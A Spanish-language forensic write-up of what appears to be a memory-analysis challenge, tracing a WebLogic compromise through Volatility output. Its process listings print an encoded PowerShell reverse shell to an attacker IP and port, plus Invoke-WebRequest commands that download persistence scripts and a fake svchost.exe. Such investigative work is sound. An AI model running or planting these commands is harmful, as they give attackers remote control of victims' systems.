Dado que el vector de ataque es el WebLogic simplemente tenemos que identificar el PID de este proceso. Como hemos visto en la pregunta anterior ejecutando netscan el pid es: 4752
vol.py -f memory.mem --profile=Win2016x64_14393 netscan | grep LISTENING | grep java
Volatility Foundation Volatility Framework 2.6.1
0xb68cb2c58a50 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb2cffb20 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:5556 :::0 LISTENING 4456 java.exe 2021-08-06 15:30:03 UTC+0000
0xb68cb2cffc70 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:1527 :::0 LISTENING 4772 java.exe 2021-08-06 15:30:07 UTC+0000
0xb68cb2e57ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb3266780 TCPv6 2001::2851:782c:d2:133b:3f57:6f7c:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb32ba4f0 TCPv6 ::1:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:01 UTC+0000
0xf8024bdf2ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+000
#14 Respuesta: 4772
what is the PID of the next entry to the previous process?
Obtención de la evidencia
De la misma forma que la pregunta anterior empleamos la utilidad netscan
vol.py -f memory.mem --profile=Win2016x64_14393 netscan | grep LISTENING | grep java
Volatility Foundation Volatility Framework 2.6.1
0xb68cb2c58a50 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb2cffb20 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:5556 :::0 LISTENING 4456 java.exe 2021-08-06 15:30:03 UTC+0000
0xb68cb2cffc70 TCPv6 7f00:1::98b0:6cb1:8cb6:ffff:1527 :::0 LISTENING 4772 java.exe 2021-08-06 15:30:07 UTC+0000
0xb68cb2e57ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb3266780 TCPv6 2001::2851:782c:d2:133b:3f57:6f7c:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
0xb68cb32ba4f0 TCPv6 ::1:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:01 UTC+0000
0xf8024bdf2ec0 TCPv6 c0a8:9083::c8e0:70b2:8cb6:ffff:7001 :::0 LISTENING 4752 java.exe 2021-08-06 15:31:00 UTC+0000
#15 Respuesta: 44
How many threads does the process responsible for the initial exploit have?
Obtención de la evidencia
Empleamos pslist para listar los procesos y filtramos por el PID obtenido en la pregunta #13
vol.py -f memory.mem --profile=Win2016x64_14393 pslist | grep 4752
Volatility Foundation Volatility Framework 2.6.1
0xffffb68cb23e4080 java.exe 4752 4556 44 0 1 0 2021-08-06 15:30:05 UTC+0000
0xffffb68cb32c6800 powershell.exe 4344 4752 15 0 1 0 2021-08-06 15:51:40 UTC+0000
0xffffb68cb356f080 powershell.exe 4200 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb322f800 powershell.exe 2712 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:45 UTC+0000
0xffffb68cb33c9080 powershell.exe 2132 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb22fe080 powershell.exe 4264 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb2df3080 powershell.exe 3684 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb1f64080 powershell.exe 3676 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:45 UTC+0000
0xffffb68cb3045080 powershell.exe 3520 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb32fa800 powershell.exe 1012 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb34b6800 powershell.exe 2200 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:45 UTC+0000
0xffffb68cb34c2800 powershell.exe 776 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
0xffffb68cb34ca800 powershell.exe 1616 4752 0 -------- 1 0 2021-08-06 15:51:40 UTC+0000 2021-08-06 15:51:44 UTC+0000
#16 Respuesta: CVE-2020-14882
The attacker gain access to the system through the webserver. What is the CVE number of the vulnerability exploited?
Obtención de la evidencia
Buscamos en Google posibles vulnerabilidades remotas que afecten a Java y encontramos el siguiente link con el exploit
#17 Respuesta: 192.168.144.129:1339
The attacker used the vulnerability he found in the webserver to execute a reverse shell command to his own server. Provide the IP and port of the attacker server? Format: IP:port
Obtención de la evidencia
Utilizamos volatility en versión 3 para listar los comandos ejecutados.
❯ python3 volatility3/vol.py -f memory.mem cmdline
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished
PID Process Args
4 System Required memory at 0x20 is not valid (process exited?)
292 smss.exe \SystemRoot\System32\smss.exe
412 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
504 smss.exe Required memory at 0xbc4f0cb020 is not valid (process exited?)
512 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
560 winlogon.exe winlogon.exe
568 wininit.exe wininit.exe
652 services.exe C:\Windows\system32\services.exe
664 lsass.exe C:\Windows\system32\lsass.exe
764 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch
824 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS
912 dwm.exe "dwm.exe"
972 svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
996 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
508 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
400 svchost.exe C:\Windows\system32\svchost.exe -k LocalService
944 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1092 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1100 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService
1592 spoolsv.exe C:\Windows\System32\spoolsv.exe
1668 svchost.exe C:\Windows\System32\svchost.exe -k utcsvc
1732 svchost.exe C:\Windows\System32\svchost.exe -k smbsvcs
1764 svchost.exe C:\Windows\system32\svchost.exe -k appmodel
1852 wlms.exe C:\Windows\system32\wlms\wlms.exe
1876 MsMpEng.exe "C:\Program Files\Windows Defender\MsMpEng.exe"
1896 vm3dservice.ex C:\Windows\system32\vm3dservice.exe
1904 vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
1912 VGAuthService. "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
892 vm3dservice.ex vm3dservice.exe -n
2136 svchost.exe C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
2812 dllhost.exe C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
2912 msdtc.exe C:\Windows\System32\msdtc.exe
3004 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
2560 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3176 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
4064 RuntimeBroker. C:\Windows\System32\RuntimeBroker.exe -Embedding
2196 sihost.exe sihost.exe
2756 svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
2424 taskhostw.exe taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1140 userinit.exe Required memory at 0x59eced020 is not valid (process exited?)
2676 explorer.exe C:\Windows\Explorer.EXE
3496 ShellExperienc "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
3408 SearchUI.exe "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
2552 ServerManager. "C:\Windows\system32\ServerManager.exe"
3732 vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
4172 jusched.exe "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
4356 cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startNodeManager.cmd"
4364 conhost.exe \??\C:\Windows\system32\conhost.exe 0x4
4456 java.exe "C:\PROGRA~1\Java\JDK18~1.0_2\bin\java.exe" -server -Xms32m -Xmx200m -Djdk.tls.ephemeralDHKeySize=2048 -Dcoherence.home=C:\Users\ADMINI~1\Desktop\wls1411\coherence -Dbea.home=C:\Users\ADMINI~1\Desktop\wls1411 -Dweblogic.RootDirectory=C:\Users\ADMINI~1\Desktop\wls1411\USER_P~1\domains\BASE_D~1 -Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader "-Djava.security.policy=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic.policy" "-Dweblogic.nodemanager.JavaHome=C:\PROGRA~1\Java\JDK18~1.0_2" weblogic.NodeManager -v
4556 cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startWebLogic.cmd"
4564 conhost.exe \??\C:\Windows\system32\conhost.exe 0x4
4736 cmd.exe cmd /c "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\bin\startNetworkServer.bat "
4752 java.exe C:\PROGRA~1\Java\JDK18~1.0_2\bin\java -server -Xms256m -Xmx512m -cp C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic-launcher.jar -Dlaunch.use.env.classpath=true -Dweblogic.Name=AdminServer -Djava.security.policy=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic.policy -Dweblogic.ProductionModeEnabled=true -Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader -javaagent:C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\debugpatch-agent.jar -da -Dwls.home=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server -Dweblogic.home=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server -Djava.endorsed.dirs=C:\PROGRA~1\Java\JDK18~1.0_2\jre\lib\endorsed;C:\Users\ADMINI~1\Desktop\wls1411\oracle_common\modules\endorsed;C:\Users\ADMINI~1\Desktop\wls1411\wlserver\modules\endorsed weblogic.Server
4772 java.exe "C:\PROGRA~1\Java\JDK18~1.0_2\bin\java.exe" -Djava.security.manager -Djava.security.policy=C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\derbyServer.policy "-Dderby.system.home=C:\Users\ADMINI~1\Desktop\wls1411\USER_P~1\domains\BASE_D~1\common\db" -classpath "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derby.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbynet.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbyclient.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbytools.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbyoptionaltools.jar" org.apache.derby.drda.NetworkServerControl start
1392 jucheck.exe "C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto
2824 fontdrvhost.ex "fontdrvhost.exe"
840 armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
4344 powershell.exe powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEANAA0AC4AMQAyADkAIgAsADEAMwAzADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
4636 conhost.exe \??\C:\Windows\system32\conhost.exe 0x4
4200 powershell.exe Required memory at 0x9888ee7020 is not valid (process exited?)
2712 powershell.exe Required memory at 0xab2c6e7020 is not valid (process exited?)
2132 powershell.exe Required memory at 0x9bb4dd9020 is not valid (process exited?)
4264 powershell.exe Required memory at 0x1002ac020 is not valid (process exited?)
3684 powershell.exe Required memory at 0xe6d36ae020 is not valid (process exited?)
3676 powershell.exe Required memory at 0x65c73a1020 is not valid (process exited?)
3520 powershell.exe Required memory at 0xa36029e020 is not valid (process exited?)
1012 powershell.exe Required memory at 0x5afb111020 is not valid (process exited?)
2200 powershell.exe Required memory at 0x91e1d32020 is not valid (process exited?)
776 powershell.exe Required memory at 0xe57ea22020 is not valid (process exited?)
1616 powershell.exe Required memory at 0x508be21020 is not valid (process exited?)
2688 mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1488 svchost.exe "C:\Users\Administrator\Desktop\svchost.exe"
4596 notepad.exe "C:\Windows\System32\notepad.exe" exfiltrator.txt
2568 RamCapture64.e "C:\Users\Administrator\Desktop\RamCapturer\x64\RamCapture64.exe"
3524 conhost.exe \??\C:\Windows\system32\conhost.exe 0x4
Desciframos el base64 mediante CyberChef
#18 Respuesta: Invoke-WebRequest -Uri «http://192.168.144.129:1338/presist.ps1» -OutFile «./presist.ps1»
multiple files were downloaded from the attacker's web server. Provide the Command used to download the PowerShell script used for persistence?
Obtención de la evidencia
l.py -f memory.mem --profile=Win2016x64_14393 memdump -n powershell.exe -D powershell
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing powershell.exe [ 4344] to 4344.dmp
************************************************************************
Writing powershell.exe [ 4200] to 4200.dmp
************************************************************************
Writing powershell.exe [ 2712] to 2712.dmp
************************************************************************
Writing powershell.exe [ 2132] to 2132.dmp
************************************************************************
Writing powershell.exe [ 4264] to 4264.dmp
************************************************************************
Writing powershell.exe [ 3684] to 3684.dmp
************************************************************************
Writing powershell.exe [ 3676] to 3676.dmp
************************************************************************
Writing powershell.exe [ 3520] to 3520.dmp
************************************************************************
Writing powershell.exe [ 1012] to 1012.dmp
************************************************************************
Writing powershell.exe [ 2200] to 2200.dmp
************************************************************************
Writing powershell.exe [ 776] to 776.dmp
************************************************************************
Writing powershell.exe [ 1616] to 1616.dmp
Buscamos mediante Strings y filtramos por: Invoke-WebRequest
strings -e l powershell/*.dmp | grep Invoke-WebRequest
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Invoke-WebRequest
Invoke-WebRequest
"Invoke-RestMethod", "Invoke-WebRequest", "Register-ObjectEvent", "Register-EngineEvent",
Invoke-WebRequest
Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.144.129:1338/presist.ps1" -OutFile "./presist.ps1"
Invoke-WebRequest
Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.144.129:1338/svchost.exe" -OutFile "./svchost.exe"
Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.144.129:1338/pastebin.ps1" -OutFile "./pastebin.ps1"
Invoke-WebRequest
Now requires Powershell 3.0+ (Invoke-WebRequest)
Invoke-WebRequest
Now requires Powershell 3.0+ (Invoke-WebRequest)
Now requires Powershell 3.0+ (Invoke-WebRequest)
Más información
- Use PowerShell to download a file with HTTP, HTTPS, and FTP
- Volatility, my own cheatsheet (Part 3): Process Memory
#19 Respuesta: T1053.005
What is the MITRE ID related to the persistence technique the attacker used?
Obtención de la evidencia
vol.py -f memory.mem --profile=Win2016x64_14393 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid: 4
************************************************************************
smss.exe pid: 292
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid: 412
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
smss.exe pid: 504
************************************************************************
csrss.exe pid: 512
Command line : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid: 560
Command line : winlogon.exe
************************************************************************
wininit.exe pid: 568
Command line : wininit.exe
************************************************************************
services.exe pid: 652
Command line : C:\Windows\system32\services.exe
************************************************************************
lsass.exe pid: 664
Command line : C:\Windows\system32\lsass.exe
************************************************************************
svchost.exe pid: 764
Command line : C:\Windows\system32\svchost.exe -k DcomLaunch
************************************************************************
svchost.exe pid: 824
Command line : C:\Windows\system32\svchost.exe -k RPCSS
************************************************************************
dwm.exe pid: 912
Command line : "dwm.exe"
************************************************************************
svchost.exe pid: 972
Command line : C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
************************************************************************
svchost.exe pid: 996
Command line : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid: 508
Command line : C:\Windows\system32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid: 400
Command line : C:\Windows\system32\svchost.exe -k LocalService
************************************************************************
svchost.exe pid: 944
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
************************************************************************
svchost.exe pid: 1092
Command line : C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
************************************************************************
svchost.exe pid: 1100
Command line : C:\Windows\system32\svchost.exe -k NetworkService
************************************************************************
spoolsv.exe pid: 1592
Command line : C:\Windows\System32\spoolsv.exe
************************************************************************
svchost.exe pid: 1668
Command line : C:\Windows\System32\svchost.exe -k utcsvc
************************************************************************
svchost.exe pid: 1732
Command line : C:\Windows\System32\svchost.exe -k smbsvcs
************************************************************************
svchost.exe pid: 1764
Command line : C:\Windows\system32\svchost.exe -k appmodel
************************************************************************
wlms.exe pid: 1852
Command line : C:\Windows\system32\wlms\wlms.exe
************************************************************************
MsMpEng.exe pid: 1876
Command line : "C:\Program Files\Windows Defender\MsMpEng.exe"
************************************************************************
vm3dservice.ex pid: 1896
Command line : C:\Windows\system32\vm3dservice.exe
************************************************************************
vmtoolsd.exe pid: 1904
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
************************************************************************
VGAuthService. pid: 1912
Command line : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
************************************************************************
vm3dservice.ex pid: 892
Command line : vm3dservice.exe -n
************************************************************************
svchost.exe pid: 2136
Command line : C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
************************************************************************
dllhost.exe pid: 2812
Command line : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
************************************************************************
msdtc.exe pid: 2912
Command line : C:\Windows\System32\msdtc.exe
************************************************************************
WmiPrvSE.exe pid: 3004
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
WmiPrvSE.exe pid: 2560
Command line : C:\Windows\system32\wbem\wmiprvse.exe
************************************************************************
svchost.exe pid: 3176
Command line : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
************************************************************************
RuntimeBroker. pid: 4064
Command line : C:\Windows\System32\RuntimeBroker.exe -Embedding
************************************************************************
sihost.exe pid: 2196
Command line : sihost.exe
************************************************************************
svchost.exe pid: 2756
Command line : C:\Windows\system32\svchost.exe -k UnistackSvcGroup
************************************************************************
taskhostw.exe pid: 2424
Command line : taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
************************************************************************
userinit.exe pid: 1140
************************************************************************
explorer.exe pid: 2676
Command line : C:\Windows\Explorer.EXE
************************************************************************
ShellExperienc pid: 3496
Command line : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
************************************************************************
SearchUI.exe pid: 3408
Command line : "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
************************************************************************
ServerManager. pid: 2552
Command line : "C:\Windows\system32\ServerManager.exe"
************************************************************************
vmtoolsd.exe pid: 3732
Command line : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
************************************************************************
jusched.exe pid: 4172
Command line : "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
************************************************************************
cmd.exe pid: 4356
Command line : "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startNodeManager.cmd"
************************************************************************
conhost.exe pid: 4364
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
java.exe pid: 4456
Command line :
************************************************************************
cmd.exe pid: 4556
Command line : "C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startWebLogic.cmd"
************************************************************************
conhost.exe pid: 4564
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
cmd.exe pid: 4736
Command line : cmd /c "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\bin\startNetworkServer.bat "
************************************************************************
java.exe pid: 4752
Command line :
************************************************************************
java.exe pid: 4772
Command line :
************************************************************************
jucheck.exe pid: 1392
Command line : "C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto
************************************************************************
fontdrvhost.ex pid: 2824
Command line : "fontdrvhost.exe"
************************************************************************
armsvc.exe pid: 840
Command line : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
************************************************************************
powershell.exe pid: 4344
Command line :
************************************************************************
conhost.exe pid: 4636
Command line : \??\C:\Windows\system32\conhost.exe 0x4
************************************************************************
powershell.exe pid: 4200
************************************************************************
powershell.exe pid: 2712
************************************************************************
powershell.exe pid: 2132
************************************************************************
powershell.exe pid: 4264
************************************************************************
powershell.exe pid: 3684
************************************************************************
powershell.exe pid: 3676
************************************************************************
powershell.exe pid: 3520
************************************************************************
powershell.exe pid: 1012
************************************************************************
powershell.exe pid: 2200
************************************************************************
powershell.exe pid: 776
************************************************************************
powershell.exe pid: 1616
************************************************************************
mmc.exe pid: 2688
Command line : "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
************************************************************************
svchost.exe pid: 1488
Command line : "C:\Users\Administrator\Desktop\svchost.exe"
************************************************************************
notepad.exe pid: 4596
Command line : "C:\Windows\System32\notepad.exe" exfiltrator.txt
************************************************************************
RamCapture64.e pid: 2568
Command line : "C:\Users\Administrator\Desktop\RamCapturer\x64\RamCapture64.exe"
************************************************************************
conhost.exe pid: 3524
Command line : \??\C:\Windows\system32\conhost.exe 0x4
Más información
#20 Respuesta: fc627cf00878e4d4f7997cb26a80e6fc
After maintaining persistence, the attacker dropped a cobalt strike beacon. Try to analyze it and provide the Publickey_MD5.
Obtención de la evidencia
Intento buscar mediante el plugin cobaltstrikescan el proceso sin ningún resultado. por lo tanto utilice la opción malfind
vol.py -f memory.mem --profile=Win2016x64_14393 malfind
Volatility Foundation Volatility Framework 2.6.1
Process: MsMpEng.exe Pid: 1876 Address: 0x202d43d0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000202d43d0000 55 48 8d 2c 24 48 83 ec 20 48 8b 01 48 8b 49 08 UH.,$H...H..H.I.
0x00000202d43d0010 ff d0 48 8d 65 00 5d c3 cc cc cc cc cc cc cc cc ..H.e.].........
0x00000202d43d0020 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000202d43d0030 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc ................
0x00000000d43d0000 55 PUSH EBP
0x00000000d43d0001 48 DEC EAX
0x00000000d43d0002 8d2c24 LEA EBP, [ESP]
0x00000000d43d0005 48 DEC EAX
0x00000000d43d0006 83ec20 SUB ESP, 0x20
0x00000000d43d0009 48 DEC EAX
0x00000000d43d000a 8b01 MOV EAX, [ECX]
0x00000000d43d000c 48 DEC EAX
0x00000000d43d000d 8b4908 MOV ECX, [ECX+0x8]
0x00000000d43d0010 ffd0 CALL EAX
0x00000000d43d0012 48 DEC EAX
0x00000000d43d0013 8d6500 LEA ESP, [EBP+0x0]
0x00000000d43d0016 5d POP EBP
0x00000000d43d0017 c3 RET
0x00000000d43d0018 cc INT 3
0x00000000d43d0019 cc INT 3
0x00000000d43d001a cc INT 3
0x00000000d43d001b cc INT 3
0x00000000d43d001c cc INT 3
0x00000000d43d001d cc INT 3
0x00000000d43d001e cc INT 3
0x00000000d43d001f cc INT 3
0x00000000d43d0020 cc INT 3
0x00000000d43d0021 cc INT 3
0x00000000d43d0022 cc INT 3
0x00000000d43d0023 cc INT 3
0x00000000d43d0024 cc INT 3
0x00000000d43d0025 cc INT 3
0x00000000d43d0026 cc INT 3
0x00000000d43d0027 cc INT 3
0x00000000d43d0028 cc INT 3
0x00000000d43d0029 cc INT 3
0x00000000d43d002a cc INT 3
0x00000000d43d002b cc INT 3
0x00000000d43d002c cc INT 3
0x00000000d43d002d cc INT 3
0x00000000d43d002e cc INT 3
0x00000000d43d002f cc INT 3
0x00000000d43d0030 cc INT 3
0x00000000d43d0031 cc INT 3
0x00000000d43d0032 cc INT 3
0x00000000d43d0033 cc INT 3
0x00000000d43d0034 cc INT 3
0x00000000d43d0035 cc INT 3
0x00000000d43d0036 cc INT 3
0x00000000d43d0037 cc INT 3
0x00000000d43d0038 cc INT 3
0x00000000d43d0039 cc INT 3
0x00000000d43d003a cc INT 3
0x00000000d43d003b cc INT 3
0x00000000d43d003c cc INT 3
0x00000000d43d003d cc INT 3
0x00000000d43d003e cc INT 3
0x00000000d43d003f cc INT 3
Process: MsMpEng.exe Pid: 1876 Address: 0x202d78a0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
